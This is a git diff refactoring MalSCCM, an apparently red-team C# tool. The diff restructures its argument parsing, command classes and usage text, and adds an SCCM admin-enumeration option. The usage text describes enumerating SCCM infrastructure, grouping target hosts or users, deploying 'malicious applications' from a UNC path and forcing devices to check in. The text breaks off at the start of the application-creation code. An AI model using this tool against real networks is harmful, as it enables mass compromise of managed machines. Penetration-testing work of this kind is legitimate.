diff --git a/.gitignore b/.gitignore index b1c2275..e343822 100644 --- a/.gitignore +++ b/.gitignore @@ -5,4 +5,4 @@ [Bb]in/ [Oo]bj/ .DS_Store - +*.idea diff --git a/MalSCCM/Args/ArgumentParser.cs b/MalSCCM/Args/ArgumentParser.cs index da49f9d..932764d 100644 --- a/MalSCCM/Args/ArgumentParser.cs +++ b/MalSCCM/Args/ArgumentParser.cs @@ -1,43 +1,42 @@ using System.Collections.Generic; using System.Diagnostics; -namespace MalSCCM.Args +namespace MalSCCM.Args; + +public static class ArgumentParser { - public static class ArgumentParser + public static ArgumentParserResult Parse(IEnumerable args) { - public static ArgumentParserResult Parse(IEnumerable args) + var arguments = new Dictionary(); + try { - var arguments = new Dictionary(); - try + foreach (var argument in args) { - foreach (var argument in args) + var idx = argument.IndexOf(':'); + if (idx > 0) + { + arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1); + } + else { - var idx = argument.IndexOf(':'); + idx = argument.IndexOf('='); if (idx > 0) { arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1); } else { - idx = argument.IndexOf('='); - if (idx > 0) - { - arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1); - } - else - { - arguments[argument] = string.Empty; - } + arguments[argument] = string.Empty; } } - - return ArgumentParserResult.Success(arguments); - } - catch (System.Exception ex) - { - Debug.WriteLine(ex.Message); - return ArgumentParserResult.Failure(); } + + return ArgumentParserResult.Success(arguments); + } + catch (System.Exception ex) + { + Debug.WriteLine(ex.Message); + return ArgumentParserResult.Failure(); } } -} +} \ No newline at end of file diff --git a/MalSCCM/Args/ArgumentParserResult.cs b/MalSCCM/Args/ArgumentParserResult.cs index 26c1aca..bd9533c 100644 --- a/MalSCCM/Args/ArgumentParserResult.cs +++ b/MalSCCM/Args/ArgumentParserResult.cs @@ -1,23 +1,22 @@ using System.Collections.Generic; -namespace MalSCCM.Args +namespace MalSCCM.Args; + +public class ArgumentParserResult { - public class ArgumentParserResult - { - public bool ParsedOk { get; } - public Dictionary Arguments { get; } + public bool ParsedOk { get; } + public Dictionary Arguments { get; } - private ArgumentParserResult(bool parsedOk, Dictionary arguments) - { - ParsedOk = parsedOk; - Arguments = arguments; - } + private ArgumentParserResult(bool parsedOk, Dictionary arguments) + { + ParsedOk = parsedOk; + Arguments = arguments; + } - public static ArgumentParserResult Success(Dictionary arguments) - => new ArgumentParserResult(true, arguments); + public static ArgumentParserResult Success(Dictionary arguments) + => new ArgumentParserResult(true, arguments); - public static ArgumentParserResult Failure() - => new ArgumentParserResult(false, null); + public static ArgumentParserResult Failure() + => new ArgumentParserResult(false, null); - } } \ No newline at end of file diff --git a/MalSCCM/Args/CommandCollection.cs b/MalSCCM/Args/CommandCollection.cs index 523a9e4..9f0273b 100644 --- a/MalSCCM/Args/CommandCollection.cs +++ b/MalSCCM/Args/CommandCollection.cs @@ -1,48 +1,52 @@ using System; using System.Collections.Generic; +using System.Linq; + using MalSCCM.Commands; -namespace MalSCCM.Args +namespace MalSCCM.Args; + +public class CommandCollection { - public class CommandCollection - { - private readonly Dictionary> _availableCommands = new Dictionary>(); + private readonly List _availableCommands = new(); - // How To Add A New Command: - // 1. Create your command class in the Commands Folder - // a. That class must have a CommandName static property that has the Command's name - // and must also Implement the ICommand interface - // b. Put the code that does the work into the Execute() method - // 2. Add an entry to the _availableCommands dictionary in the Constructor below. + // How To Add A New Command: + // - Create your command class in the Commands Folder + // - That class must implement the ICommand interface + // - Give the command a name + // - Put the code that does the work into the Execute() method - public CommandCollection() + public CommandCollection() + { + // instantiate each command dynamically + + var self = typeof(CommandCollection).Assembly; + + // loop through each type + foreach (var type in self.GetTypes()) { - _availableCommands.Add(Inspect.CommandName, () => new Inspect()); - _availableCommands.Add(Group.CommandName, () => new Group()); - _availableCommands.Add(App.CommandName, () => new App()); - _availableCommands.Add(Checkin.CommandName, () => new Checkin()); - _availableCommands.Add(Locate.CommandName, () => new Locate()); - + // ignore if they don't implement ICommand or if it's the interface itself + if (!typeof(ICommand).IsAssignableFrom(type) || type.Name.Equals("ICommand")) + continue; + + // instantiate a new instance + var command = (ICommand)Activator.CreateInstance(type); + _availableCommands.Add(command); } + } - public bool ExecuteCommand(string commandName, Dictionary arguments) - { - bool commandWasFound; - - if (string.IsNullOrEmpty(commandName) || _availableCommands.ContainsKey(commandName) == false) - commandWasFound= false; - else - { - // Create the command object - var command = _availableCommands[commandName].Invoke(); - - // and execute it with the arguments from the command line - command.Execute(arguments); - - commandWasFound = true; - } - - return commandWasFound; - } + public bool ExecuteCommand(string commandName, Dictionary arguments) + { + // find the correct command, case-insensitive + var command = _availableCommands.FirstOrDefault(c => + c.CommandName.Equals(commandName, StringComparison.OrdinalIgnoreCase)); + + // return false if command is null (i.e. not found) + if (command is null) + return false; + + // otherwise execute and return true + command.Execute(arguments); + return true; } } \ No newline at end of file diff --git a/MalSCCM/Args/Info.cs b/MalSCCM/Args/Info.cs index f0a4d28..4cf1a4c 100644 --- a/MalSCCM/Args/Info.cs +++ b/MalSCCM/Args/Info.cs @@ -1,48 +1,53 @@ using System; -namespace MalSCCM.Args +namespace MalSCCM.Args; + +public static class Info { - public static class Info + public static void ShowLogo() + { + const string logo = """ + __ __ _ ____ ____ ____ __ __ + | \/ | __ _| / ___| / ___/ ___| \/ | + | |\/| |/ _` | \___ \| | | | | |\/| | + | | | | (_| | |___) | |__| |___| | | | + |_| |_|\__,_|_|____/ \____\____|_| |_| + Phil Keeble @ Nettitude Red Team + + """; + + Console.WriteLine(logo); + } + + public static void ShowUsage() { - public static void ShowLogo() - { - string logo = @" __ __ _ ____ ____ ____ __ __ -| \/ | __ _| / ___| / ___/ ___| \/ | -| |\/| |/ _` | \___ \| | | | | |\/| | -| | | | (_| | |___) | |__| |___| | | | -|_| |_|\__,_|_|____/ \____\____|_| |_| - Phil Keeble @ Nettitude Red Team -"; - Console.WriteLine(logo); - } - - public static void ShowUsage() - { - string usage = @"Commands listed below have optional parameters in <>. - -Attempt to find the SCCM management and primary servers: - MalSCCM.exe locate - -Inspect the primary server to gather SCCM information: - MalSCCM.exe inspect - -Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users: - MalSCCM.exe group /create /groupname:example /grouptype:[user|device] - MalSCCM.exe group /delete /groupname:example - MalSCCM.exe group /addhost /groupname:example /host:examplehost - MalSCCM.exe group /adduser /groupname:example /user:exampleuser - -Create/Deploy/Delete malicious applications: - MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" - MalSCCM.exe app /delete /name:appname - MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 - MalSCCM.exe app /deletedeploy /name:appname - MalSCCM.exe app /cleanup /name:appname - -Force devices of a group to checkin within a couple minutes: - MalSCCM.exe checkin /groupname:example -"; - Console.WriteLine(usage); - } + const string usage = """ + Commands listed below have optional parameters in <>. + + Attempt to find the SCCM management and primary servers: + MalSCCM.exe locate + + Inspect the primary server to gather SCCM information: + MalSCCM.exe inspect + + Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users: + MalSCCM.exe group /create /groupname:example /grouptype:[user|device] + MalSCCM.exe group /delete /groupname:example + MalSCCM.exe group /addhost /groupname:example /host:examplehost + MalSCCM.exe group /adduser /groupname:example /user:exampleuser + + Create/Deploy/Delete malicious applications: + MalSCCM.exe app /create /name:appname /uncpath:"\\unc\path" + MalSCCM.exe app /delete /name:appname + MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 + MalSCCM.exe app /deletedeploy /name:appname + MalSCCM.exe app /cleanup /name:appname + + Force devices of a group to checkin within a couple minutes: + MalSCCM.exe checkin /groupname:example + + """; + + Console.WriteLine(usage); } -} +} \ No newline at end of file diff --git a/MalSCCM/Commands/App.cs b/MalSCCM/Commands/App.cs index f332388..20123f0 100644 --- a/MalSCCM/Commands/App.cs +++ b/MalSCCM/Commands/App.cs @@ -1,92 +1,89 @@ using System; using System.Collections.Generic; -namespace MalSCCM.Commands -{ - public class App : ICommand - { - - public static string CommandName => "app"; - public static string AppName = ""; - public static string UNCPath = ""; - public static string AssignmentName = ""; +namespace MalSCCM.Commands; +public class App : ICommand +{ + public string CommandName => "app"; + + public static string AppName = ""; + public static string UNCPath = ""; + public static string AssignmentName = ""; - public void Execute(Dictionary arguments) + public void Execute(Dictionary arguments) + { + if (arguments.TryGetValue("/server", out var argument)) { - if (arguments.ContainsKey("/server")) - { - Inspect.ServerName = arguments["/server"]; - } - - Console.WriteLine("[*] Action: Manipulating SCCM Applications"); - - if (arguments.ContainsKey("/groupname")) - { - Group.GroupName = arguments["/groupname"]; - } + Inspect.ServerName = argument; + } - if (arguments.ContainsKey("/name")) - { - AppName = arguments["/name"]; - } + Console.WriteLine("[*] Action: Manipulating SCCM Applications"); - if (arguments.ContainsKey("/uncpath")) - { - UNCPath = arguments["/uncpath"]; - } + if (arguments.TryGetValue("/groupname", out var argument1)) + { + Group.GroupName = argument1; + } - if (arguments.ContainsKey("/assignmentname")) - { - AssignmentName = arguments["/assignmentname"]; - } + if (arguments.TryGetValue("/name", out var argument2)) + { + AppName = argument2; + } - if (!Enum.FbGetSiteScope()) - { - Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); - if (!Enum.FbGetSiteScope2()) - { - Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); - Enum.FbGetSiteScope3(); - } - } + if (arguments.TryGetValue("/uncpath", out var argument3)) + { + UNCPath = argument3; + } - if (arguments.ContainsKey("/create")) - { - Console.WriteLine("[*] Action: Creating SCCM Application"); - Application.FbCreateSCCMApplication(); - } + if (arguments.TryGetValue("/assignmentname", out var argument4)) + { + AssignmentName = argument4; + } - if (arguments.ContainsKey("/delete")) + if (!Enum.FbGetSiteScope()) + { + Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); + if (!Enum.FbGetSiteScope2()) { - Console.WriteLine("[*] Action: Deleting SCCM Application"); - Application.FbRemoveSCCMApplication(); + Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); + Enum.FbGetSiteScope3(); } + } - if (arguments.ContainsKey("/deploy")) - { - Console.WriteLine("[*] Action: Gathering group ID"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("[*] Action: Deploying SCCM Application"); - Application.FbDeploySCCMApplication(); - } + if (arguments.ContainsKey("/create")) + { + Console.WriteLine("[*] Action: Creating SCCM Application"); + Application.FbCreateSCCMApplication(); + } - if (arguments.ContainsKey("/deletedeploy")) - { - Console.WriteLine("[*] Action: Removing SCCM Application Deployment"); - Application.FbRemoveSCCMApplicationDeployment(); - } + if (arguments.ContainsKey("/delete")) + { + Console.WriteLine("[*] Action: Deleting SCCM Application"); + Application.FbRemoveSCCMApplication(); + } - if (arguments.ContainsKey("/cleanup")) - { - Console.WriteLine("[*] Action: Removing SCCM Application Deployment"); - Application.FbRemoveSCCMApplicationDeployment(); - Console.WriteLine("[*] Action: Deleting SCCM Application"); - Application.FbRemoveSCCMApplication(); - } + if (arguments.ContainsKey("/deploy")) + { + Console.WriteLine("[*] Action: Gathering group ID"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("[*] Action: Deploying SCCM Application"); + Application.FbDeploySCCMApplication(); + } + if (arguments.ContainsKey("/deletedeploy")) + { + Console.WriteLine("[*] Action: Removing SCCM Application Deployment"); + Application.FbRemoveSCCMApplicationDeployment(); + } - Console.WriteLine("\r\n[*] App complete\r\n"); + if (arguments.ContainsKey("/cleanup")) + { + Console.WriteLine("[*] Action: Removing SCCM Application Deployment"); + Application.FbRemoveSCCMApplicationDeployment(); + Console.WriteLine("[*] Action: Deleting SCCM Application"); + Application.FbRemoveSCCMApplication(); } + + Console.WriteLine("\r\n[*] App complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/Checkin.cs b/MalSCCM/Commands/Checkin.cs index 0766f47..af4f9ee 100644 --- a/MalSCCM/Commands/Checkin.cs +++ b/MalSCCM/Commands/Checkin.cs @@ -1,46 +1,44 @@ using System; using System.Collections.Generic; -namespace MalSCCM.Commands -{ - public class Checkin : ICommand - { - - public static string CommandName => "checkin"; +namespace MalSCCM.Commands; +public class Checkin : ICommand +{ + public string CommandName => "checkin"; - public void Execute(Dictionary arguments) + public void Execute(Dictionary arguments) + { + if (arguments.TryGetValue("/server", out var argument)) { - if (arguments.ContainsKey("/server")) - { - Inspect.ServerName = arguments["/server"]; - } + Inspect.ServerName = argument; + } - Console.WriteLine("[*] Action: Causing SCCM poll"); + Console.WriteLine("[*] Action: Causing SCCM poll"); - if (arguments.ContainsKey("/groupname")) - { - Group.GroupName = arguments["/groupname"]; - } + if (arguments.TryGetValue("/groupname", out var argument1)) + { + Group.GroupName = argument1; + } - if (!Enum.FbGetSiteScope()) + if (!Enum.FbGetSiteScope()) + { + Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); + if (!Enum.FbGetSiteScope2()) { - Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); - if (!Enum.FbGetSiteScope2()) - { - Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); - Enum.FbGetSiteScope3(); - } + Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); + Enum.FbGetSiteScope3(); } + } - if (arguments.ContainsKey("/groupname")) - { - Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("[*] Action: Forcing Group To Checkin for Updates"); - Check.FbSCCMDeviceCheckin(); - } - Console.WriteLine("\r\n[*] Checkin complete\r\n"); + if (arguments.ContainsKey("/groupname")) + { + Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("[*] Action: Forcing Group To Checkin for Updates"); + Check.FbSCCMDeviceCheckin(); } + + Console.WriteLine("\r\n[*] Checkin complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/Group.cs b/MalSCCM/Commands/Group.cs index 3f768d8..09c79a5 100644 --- a/MalSCCM/Commands/Group.cs +++ b/MalSCCM/Commands/Group.cs @@ -1,99 +1,96 @@ using System; using System.Collections.Generic; -namespace MalSCCM.Commands +namespace MalSCCM.Commands; + +public class Group : ICommand { - public class Group : ICommand + public string CommandName => "group"; + + public static string GroupName = ""; + public static string GroupType = ""; + public static string SystemCollectionID = ""; + public static string UserCollectionID = ""; + public static string TargetCollectionID = ""; + public static string UserName = ""; + public static string DeviceName = ""; + public static string ResourceID = ""; + + public void Execute(Dictionary arguments) { - - public static string CommandName => "group"; - public static string GroupName = ""; - public static string GroupType = ""; - public static string SystemCollectionID = ""; - public static string UserCollectionID = ""; - public static string TargetCollectionID = ""; - public static string UserName = ""; - public static string DeviceName = ""; - public static string ResourceID = ""; - - - public void Execute(Dictionary arguments) + if (arguments.TryGetValue("/server", out var argument)) { - if (arguments.ContainsKey("/server")) - { - Inspect.ServerName = arguments["/server"]; - } - - Console.WriteLine("[*] Action: Manipulating SCCM Groups"); - - if (arguments.ContainsKey("/groupname")) - { - GroupName = arguments["/groupname"]; - } + Inspect.ServerName = argument; + } - if (arguments.ContainsKey("/grouptype")) - { - GroupType = arguments["/grouptype"]; - } + Console.WriteLine("[*] Action: Manipulating SCCM Groups"); - if (arguments.ContainsKey("/user")) - { - UserName = arguments["/user"]; - } + if (arguments.TryGetValue("/groupname", out var argument1)) + { + GroupName = argument1; + } - if (arguments.ContainsKey("/host")) - { - DeviceName = arguments["/host"]; - } + if (arguments.TryGetValue("/grouptype", out var argument2)) + { + GroupType = argument2; + } - if (!Enum.FbGetSiteScope()) - { - Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); - if (!Enum.FbGetSiteScope2()) - { - Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); - Enum.FbGetSiteScope3(); - } - } + if (arguments.TryGetValue("/user", out var argument3)) + { + UserName = argument3; + } - if (arguments.ContainsKey("/create")) - { - Console.WriteLine("[*] Action: Creating SCCM Group"); - Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("\r\n[*] Action: Creating Collection"); - Groups.FbNewSCCMCollection(); - } + if (arguments.TryGetValue("/host", out var argument4)) + { + DeviceName = argument4; + } - if (arguments.ContainsKey("/delete")) + if (!Enum.FbGetSiteScope()) + { + Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); + if (!Enum.FbGetSiteScope2()) { - Console.WriteLine("[*] Action: Deleting SCCM Group"); - Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("\r\n[*] Action: Removing Collection"); - Groups.FbRemoveSCCMCollection(); + Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); + Enum.FbGetSiteScope3(); } + } - if (arguments.ContainsKey("/adduser")) - { - Console.WriteLine("[*] Action: Adding User to an SCCM Group"); - Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("\r\n[*] Action: Adding User"); - Groups.FbAddUserToSCCMCollection(); - } + if (arguments.ContainsKey("/create")) + { + Console.WriteLine("[*] Action: Creating SCCM Group"); + Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("\r\n[*] Action: Creating Collection"); + Groups.FbNewSCCMCollection(); + } - if (arguments.ContainsKey("/addhost")) - { - Console.WriteLine("[*] Action: Adding System to an SCCM Group"); - Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("\r\n[*] Action: Adding Device"); - Groups.FbAddDeviceToSCCMCollection(); - } + if (arguments.ContainsKey("/delete")) + { + Console.WriteLine("[*] Action: Deleting SCCM Group"); + Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("\r\n[*] Action: Removing Collection"); + Groups.FbRemoveSCCMCollection(); + } + if (arguments.ContainsKey("/adduser")) + { + Console.WriteLine("[*] Action: Adding User to an SCCM Group"); + Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("\r\n[*] Action: Adding User"); + Groups.FbAddUserToSCCMCollection(); + } - Console.WriteLine("\r\n[*] Group complete\r\n"); + if (arguments.ContainsKey("/addhost")) + { + Console.WriteLine("[*] Action: Adding System to an SCCM Group"); + Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("\r\n[*] Action: Adding Device"); + Groups.FbAddDeviceToSCCMCollection(); } + + Console.WriteLine("\r\n[*] Group complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/ICommand.cs b/MalSCCM/Commands/ICommand.cs index 4330083..c8dfebb 100644 --- a/MalSCCM/Commands/ICommand.cs +++ b/MalSCCM/Commands/ICommand.cs @@ -1,9 +1,9 @@ using System.Collections.Generic; -namespace MalSCCM.Commands +namespace MalSCCM.Commands; + +public interface ICommand { - public interface ICommand - { - void Execute(Dictionary arguments); - } + string CommandName { get; } + void Execute(Dictionary arguments); } \ No newline at end of file diff --git a/MalSCCM/Commands/Inspect.cs b/MalSCCM/Commands/Inspect.cs index 61d4654..ff51ee6 100644 --- a/MalSCCM/Commands/Inspect.cs +++ b/MalSCCM/Commands/Inspect.cs @@ -1,99 +1,102 @@ using System; using System.Collections.Generic; -namespace MalSCCM.Commands -{ - public class Inspect : ICommand - { +namespace MalSCCM.Commands; - public static string CommandName => "inspect"; - public static string SiteCode = ""; - public static string ServerName = "localhost"; +public class Inspect : ICommand +{ + public string CommandName => "inspect"; + + public static string SiteCode = ""; + public static string ServerName = "localhost"; - public void Execute(Dictionary arguments) + public void Execute(Dictionary arguments) + { + if (arguments.TryGetValue("/server", out var argument)) { - if (arguments.ContainsKey("/server")) - { - ServerName = arguments["/server"]; - } - - Console.WriteLine("[*] Action: Inspect SCCM Server"); - - if (!Enum.FbGetSiteScope()) - { - Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); - if (!Enum.FbGetSiteScope2()) - { - Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); - Enum.FbGetSiteScope3(); - } - } - - if (arguments.ContainsKey("/all")) - { - - Console.WriteLine("\r\n[*] Action: Get SCCM Computers"); - Enum.FbGetSCCMComputer(); - Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest"); - Enum.FbGetSCCMADForest(); - Console.WriteLine("\r\n[*] Action: Get SCCM Applications"); - Enum.FbGetSCCMApplication(); - Console.WriteLine("\r\n[*] Action: Get SCCM Packages"); - Enum.FbGetSCCMPackage(); - Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)"); - Enum.FbGetSCCMCollection(); - Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users"); - Enum.FbGetSCCMPrimaryUser(); - Console.WriteLine("\r\n[*] Action: Get SCCM Deployments"); - Enum.FbGetSCCMDeployments(); - } + ServerName = argument; + } - if (arguments.ContainsKey("/computers")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Computers"); - Enum.FbGetSCCMComputer(); - } + Console.WriteLine("[*] Action: Inspect SCCM Server"); - if (arguments.ContainsKey("/forest")) + if (!Enum.FbGetSiteScope()) + { + Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); + if (!Enum.FbGetSiteScope2()) { - Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest"); - Enum.FbGetSCCMADForest(); + Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); + Enum.FbGetSiteScope3(); } + } - if (arguments.ContainsKey("/applications")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Applications"); - Enum.FbGetSCCMApplication(); - } + if (arguments.ContainsKey("/all")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Computers"); + Enum.FbGetSCCMComputer(); + Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest"); + Enum.FbGetSCCMADForest(); + Console.WriteLine("\r\n[*] Action: Get SCCM Applications"); + Enum.FbGetSCCMApplication(); + Console.WriteLine("\r\n[*] Action: Get SCCM Packages"); + Enum.FbGetSCCMPackage(); + Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)"); + Enum.FbGetSCCMCollection(); + Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users"); + Enum.FbGetSCCMPrimaryUser(); + Console.WriteLine("\r\n[*] Action: Get SCCM Deployments"); + Enum.FbGetSCCMDeployments(); + Console.WriteLine("\r\n[*] Action: Get SCCM Admins"); + Enum.FbGetSCCMAdmins(); + } - if (arguments.ContainsKey("/packages")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Packages"); - Enum.FbGetSCCMPackage(); - } + if (arguments.ContainsKey("/computers")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Computers"); + Enum.FbGetSCCMComputer(); + } - if (arguments.ContainsKey("/groups")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)"); - Enum.FbGetSCCMCollection(); - } + if (arguments.ContainsKey("/forest")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest"); + Enum.FbGetSCCMADForest(); + } - if (arguments.ContainsKey("/primaryusers")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users"); - Enum.FbGetSCCMPrimaryUser(); - } + if (arguments.ContainsKey("/applications")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Applications"); + Enum.FbGetSCCMApplication(); + } - if (arguments.ContainsKey("/deployments")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Deployments"); - Enum.FbGetSCCMDeployments(); - } + if (arguments.ContainsKey("/packages")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Packages"); + Enum.FbGetSCCMPackage(); + } + if (arguments.ContainsKey("/groups")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)"); + Enum.FbGetSCCMCollection(); + } + if (arguments.ContainsKey("/primaryusers")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users"); + Enum.FbGetSCCMPrimaryUser(); + } + if (arguments.ContainsKey("/deployments")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Deployments"); + Enum.FbGetSCCMDeployments(); + } - Console.WriteLine("\r\n[*] Inspect complete\r\n"); + if (arguments.ContainsKey("/admins")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Admins"); + Enum.FbGetSCCMAdmins(); } + + Console.WriteLine("\r\n[*] Inspect complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/Locate.cs b/MalSCCM/Commands/Locate.cs index db15508..c9e42bd 100644 --- a/MalSCCM/Commands/Locate.cs +++ b/MalSCCM/Commands/Locate.cs @@ -1,46 +1,45 @@ using System; using System.Collections.Generic; -namespace MalSCCM.Commands -{ - public class Locate : ICommand - { +namespace MalSCCM.Commands; - public static string CommandName => "locate"; - public static string SiteCode = ""; - public static string ServerName = "localhost"; +public class Locate : ICommand +{ + public string CommandName => "locate"; + + public static string SiteCode = ""; + public static string ServerName = "localhost"; - public void Execute(Dictionary arguments) + public void Execute(Dictionary arguments) + { + if (arguments.TryGetValue("/server", out var argument)) { - if (arguments.ContainsKey("/server")) - { - ServerName = arguments["/server"]; - } + ServerName = argument; + } - Console.WriteLine("[*] Action: Locating SCCM Management Servers"); + Console.WriteLine("[*] Action: Locating SCCM Management Servers"); - if (!Enum.FbGetSiteScope()) + if (!Enum.FbGetSiteScope()) + { + Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); + if (!Enum.FbGetSiteScope2()) { - Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); - if (!Enum.FbGetSiteScope2()) - { - Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); - Enum.FbGetSiteScope3(); - } + Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); + Enum.FbGetSiteScope3(); } + } - Console.WriteLine("\r\n[!] Note - Managment Server may not be the Primary Server which is needed for exploitation."); - Console.WriteLine("[!] Note - You can try use 'inspect /server:' to see if the management server is exploitable."); - Console.WriteLine("[!] Note - If you are on a management server, the registry checks below should return the primary server"); + Console.WriteLine("\r\n[!] Note - Managment Server may not be the Primary Server which is needed for exploitation."); + Console.WriteLine("[!] Note - You can try use 'inspect /server:' to see if the management server is exploitable."); + Console.WriteLine("[!] Note - If you are on a management server, the registry checks below should return the primary server"); - Console.WriteLine("\r\n[*] Action: Locating SCCM Servers in Registry"); + Console.WriteLine("\r\n[*] Action: Locating SCCM Servers in Registry"); - Enum.FbGetSCCMPrimaryServerRegKey(); + Enum.FbGetSCCMPrimaryServerRegKey(); - Console.WriteLine("\r\n[!] Note - If looking for reg keys failed, make sure you are on a management server!"); - Console.WriteLine("[!] Note - Alternate ways of finding the primary server could be shares on the network (SMS_) will be the name of a share on the primary server."); + Console.WriteLine("\r\n[!] Note - If looking for reg keys failed, make sure you are on a management server!"); + Console.WriteLine("[!] Note - Alternate ways of finding the primary server could be shares on the network (SMS_) will be the name of a share on the primary server."); - Console.WriteLine("\r\n[*] Locate complete\r\n"); - } + Console.WriteLine("\r\n[*] Locate complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/MalSCCM.csproj b/MalSCCM/MalSCCM.csproj index 53d038d..cefe1d0 100644 --- a/MalSCCM/MalSCCM.csproj +++ b/MalSCCM/MalSCCM.csproj @@ -8,9 +8,9 @@ Exe MalSCCM MalSCCM - v3.5 512 true + 11 AnyCPU diff --git a/MalSCCM/Program.cs b/MalSCCM/Program.cs index a08553c..43e0470 100644 --- a/MalSCCM/Program.cs +++ b/MalSCCM/Program.cs @@ -1,47 +1,46 @@ using System; using System.Collections.Generic; + using MalSCCM.Args; -namespace MalSCCM +namespace MalSCCM; + +public static class Program { - class Program + private static void MainExecute(string commandName, Dictionary parsedArgs) { - private static void MainExecute(string commandName, Dictionary parsedArgs) - { - // main execution logic - - Info.ShowLogo(); + // main execution logic - try - { - var commandFound = new CommandCollection().ExecuteCommand(commandName, parsedArgs); - - // show the usage if no commands were found for the command name - if (commandFound == false) - Info.ShowUsage(); - } - catch (Exception e) - { - Console.WriteLine("\r\n[!] Unhandled MalSCCM exception:\r\n"); - Console.WriteLine(e); - } - } + Info.ShowLogo(); - public static void Main(string[] args) + try { - // try to parse the command line arguments, show usage on failure and then bail - var parsed = ArgumentParser.Parse(args); - if (parsed.ParsedOk == false) - { - Info.ShowLogo(); - Info.ShowUsage(); - return; - } + var commandFound = new CommandCollection().ExecuteCommand(commandName, parsedArgs); - var commandName = args.Length != 0 ? args[0] : ""; + // show the usage if no commands were found for the command name + if (commandFound == false) + Info.ShowUsage(); + } + catch (Exception e) + { + Console.WriteLine("\r\n[!] Unhandled MalSCCM exception:\r\n"); + Console.WriteLine(e); + } + } - MainExecute(commandName, parsed.Arguments); + public static void Main(string[] args) + { + // try to parse the command line arguments, show usage on failure and then bail + var parsed = ArgumentParser.Parse(args); + if (parsed.ParsedOk == false) + { + Info.ShowLogo(); + Info.ShowUsage(); + return; } + + var commandName = args.Length != 0 ? args[0] : ""; + MainExecute(commandName, parsed.Arguments); } -} +} \ No newline at end of file diff --git a/MalSCCM/lib/Application.cs b/MalSCCM/lib/Application.cs index 61aa64e..a0da2df 100644 --- a/MalSCCM/lib/Application.cs +++ b/MalSCCM/lib/Application.cs @@ -1,21 +1,22 @@ using System; using System.Management; using System.Text; + using MalSCCM.Commands; -public class Application +public static class Application { public static bool FbCreateSCCMApplication() { try { - ManagementClass IDClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Identification"); - ManagementClass AppClass = new 